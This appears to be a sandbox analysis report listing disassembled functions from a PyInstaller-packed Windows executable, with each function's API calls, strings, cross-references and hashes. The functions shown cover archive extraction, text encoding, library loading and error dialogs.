Function 00007FF6E60A15A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6E60A1639
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6E60A1609
fread, xrefs: 00007FF6E60A16C9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6E60A16C2
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6E60A15D3
fseek, xrefs: 00007FF6E60A1610
malloc, xrefs: 00007FF6E60A1640

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 62e974c1c6e7d120c348aa5a1d995ef2678b7903ade27c6c4b52a2abef3b6d35
Instruction ID: b0ee3bb54718ef69568b1da1d955e3fe16bb41b7c97db4cf6aa6e1c06751a842
Opcode Fuzzy Hash: 62e974c1c6e7d120c348aa5a1d995ef2678b7903ade27c6c4b52a2abef3b6d35
Instruction Fuzzy Hash: EF31C333B2866346EA209B51A6007BA6390EF047D4F584431DE4ECBB99EE7FE545C70A

Function 00007FF6E60AEB00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6E60AEB5D

Part of subcall function 00007FF6E60AFA70: __GetUnwindTryBlock.LIBCMT ref: 00007FF6E60AFAB3
Part of subcall function 00007FF6E60AFA70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6E60AFAD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6E60AEC35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6E60AEE8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6E60AEF96

Strings

csm, xrefs: 00007FF6E60AEB77
csm, xrefs: 00007FF6E60AEBDE
csm, xrefs: 00007FF6E60AEC58

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction ID: cacfcc97c49d1191db29cf40ebc47f57c51edaa292abfbd425200aaa9cdd5112
Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction Fuzzy Hash: EAE1AE33A287618AEB20DB25E6403AD7BA0FB447C8F104535EE5D87B95DF3AE480D706

Function 00007FF6E60A86B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8747
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A879E

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF6E60A87C6
Out of memory., xrefs: 00007FF6E60A87CF
Failed to get UTF-8 buffer size., xrefs: 00007FF6E60A87DF
WideCharToMultiByte, xrefs: 00007FF6E60A87E6
win32_utils_to_utf8, xrefs: 00007FF6E60A87D6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
Instruction ID: bec6e4f95e7dddeb890f269d10f3a67a30ac8f096a888b46fe486c6f01618ae4
Opcode Fuzzy Hash: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
Instruction Fuzzy Hash: 1B41A433A28BA282E620CF15B94027AB7A1FB847E0F544135DE9D87B98DF3ED445C709

Function 00007FF6E60A8BF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A8C31

Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0

WideCharToMultiByte.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A8CA5

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF6E60A8CAF
Out of memory., xrefs: 00007FF6E60A8C6B
Failed to get UTF-8 buffer size., xrefs: 00007FF6E60A8C3E
WideCharToMultiByte, xrefs: 00007FF6E60A8C45, 00007FF6E60A8CB6
win32_utils_to_utf8, xrefs: 00007FF6E60A8C72

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction ID: 22d8a41929dc1bf238efeb41262d05e4708a03ff637cc3794bf524abc39bdb62
Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction Fuzzy Hash: DF21AD33A29B5285EB10CF16AA402787261EB84BE0B584635DA0E97794EF3FE541C709

Function 00007FF6E60A75A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6E60A7716

Part of subcall function 00007FF6E60B0250: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B0264

Part of subcall function 00007FF6E60B0224: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B0238

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6E60A7632
ERROR: file already exists but should not: %s, xrefs: 00007FF6E60A767C
WARNING: file already exists but should not: %s, xrefs: 00007FF6E60A7698
%s%c%s, xrefs: 00007FF6E60A75E5
\, xrefs: 00007FF6E60A75EC

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: cc873c1451c3de15d74117cc9666b8cbf5086c1c2860ba2749879c362ca7babb
Instruction ID: 4cfda3224aa7e604182b77d114329120bac317cd94dd51cae6fcdf8b5484ffd2
Opcode Fuzzy Hash: cc873c1451c3de15d74117cc9666b8cbf5086c1c2860ba2749879c362ca7babb
Instruction Fuzzy Hash: DB51A537A3D66341FA2697259B503B956919F84BC0F488130E90EC77DAFE2FE500874A

Function 00007FF6E60ADDB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE3D
GetLastError.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE75
FreeLibrary.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADEBB
GetProcAddress.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADEC7

Strings

api-ms-, xrefs: 00007FF6E60ADE5D

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction ID: 5482abea4b296e557287476854be0b3a4ba64d8250ebf76f22af66b819e2bfae
Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction Fuzzy Hash: B631C633A3A66295EE11EB029A0077973D4BF54BE4F590534DD1E8A390EF3FE440830A

Function 00007FF6E60A7420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6E60A79A1,00000000,?,00000000,00000000,?,00007FF6E60A154F), ref: 00007FF6E60A747F

Part of subcall function 00007FF6E60A2B30: MessageBoxW.USER32 ref: 00007FF6E60A2C05

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6E60A7456
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6E60A7493
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6E60A74DA

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction ID: 58315c164bf322f3de57da7dfb42128ad4a0058d6ffa096a604f9788c3d19125
Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction Fuzzy Hash: 2D31A727F3C7A241FA25D721E7153BA5691AF987C0F444431DA4EC6BD6FE2FE104860A

Function 00007FF6E60A8AE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8BA0

Strings

Out of memory., xrefs: 00007FF6E60A8B62
Failed to get wchar_t buffer size., xrefs: 00007FF6E60A8B27
MultiByteToWideChar, xrefs: 00007FF6E60A8B2E, 00007FF6E60A8BB1
win32_utils_from_utf8, xrefs: 00007FF6E60A8B69
Failed to decode wchar_t from UTF-8, xrefs: 00007FF6E60A8BAA

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction ID: bea32728c738545db36c269f69bcf06b3176fb8a9e00b347403fec70c5499860
Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction Fuzzy Hash: 4021A533B28A5281EB10CB19FA00269A361FB847D4F584231DB5CD7BA9EF2FD5418709

Function 00007FF6E60BB710 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6E60BB71F
FlsGetValue.KERNEL32 ref: 00007FF6E60BB734
FlsSetValue.KERNEL32 ref: 00007FF6E60BB755
FlsSetValue.KERNEL32 ref: 00007FF6E60BB782
FlsSetValue.KERNEL32 ref: 00007FF6E60BB793
FlsSetValue.KERNEL32 ref: 00007FF6E60BB7A4
SetLastError.KERNEL32 ref: 00007FF6E60BB7BF

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
Instruction ID: edd936af635b025b5544b63df0920d38ca849947fe54ab695c6eace57ead4bd6
Opcode Fuzzy Hash: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
Instruction Fuzzy Hash: 3221A926B6862342FA286721575533962829F447B0F10C734E93EC7BCEDF6FA4014A0B

Function 00007FF6E60C85BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6E60C85ED
GetLastError.KERNEL32 ref: 00007FF6E60C85F9
CloseHandle.KERNEL32 ref: 00007FF6E60C8611
CreateFileW.KERNEL32 ref: 00007FF6E60C863C
WriteConsoleW.KERNEL32 ref: 00007FF6E60C865B

Strings

CONOUT$, xrefs: 00007FF6E60C861D

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction ID: 5318b295cf6ffd847981d4d2006a72309c6634732865ad8699189f772744534b
Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction Fuzzy Hash: 70118422B28B6186E7508B46E95432967A0FB88BF4F140234E95ECB7A4DF3FD4448759

Function 00007FF6E60BB888 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB897
FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB8CD
FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB8FA
FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB90B
FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB91C
SetLastError.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB937

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
Instruction ID: f5b07b72895703b9a41342867e5a4e9151b452f820ca9e74c55f9b574e4357fa
Opcode Fuzzy Hash: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
Instruction Fuzzy Hash: 25115B22B2867342FA146721974533922919F447B0F549734E93EC76DADF6FA402860A

Function 00007FF6E60AD778 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6E60AD7A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6E60AD838
RtlUnwindEx.KERNEL32 ref: 00007FF6E60AD887

Strings

csm, xrefs: 00007FF6E60AD81E
f, xrefs: 00007FF6E60AD7B6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction ID: 244af10eb247868321d33dd0264b56832bcc85277ec1ba94240c84848f41cb9a
Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction Fuzzy Hash: 4951D233A292228AE714CB11E614B393795FB80BD8F508130EE4E877C8DF7BE8418709

Function 00007FF6E60A2600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF6E60A27EF), ref: 00007FF6E60A2638
DialogBoxIndirectParamW.USER32 ref: 00007FF6E60A26FC
DeleteObject.GDI32 ref: 00007FF6E60A272F
DestroyIcon.USER32 ref: 00007FF6E60A2741

Strings

Unhandled exception in script, xrefs: 00007FF6E60A2668

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
Instruction ID: eddce07042b4d617b63abc92f59e0065af947a735ae783ef0551443fdb0ce6a7
Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
Instruction Fuzzy Hash: 17317E33A29A9285EB20DB21EA553F96360FF887C4F444135EA4E8BB59DF3ED105C706

Function 00007FF6E60A29E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14

Part of subcall function 00007FF6E60A8560: GetLastError.KERNEL32(00000000,00007FF6E60A2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8587
Part of subcall function 00007FF6E60A8560: FormatMessageW.KERNEL32 ref: 00007FF6E60A85B6

Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A

MessageBoxW.USER32 ref: 00007FF6E60A2AF0
MessageBoxA.USER32 ref: 00007FF6E60A2B0C

Strings

%s%s: %s, xrefs: 00007FF6E60A2A6B
Fatal error detected, xrefs: 00007FF6E60A2AC6, 00007FF6E60A2AFE

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
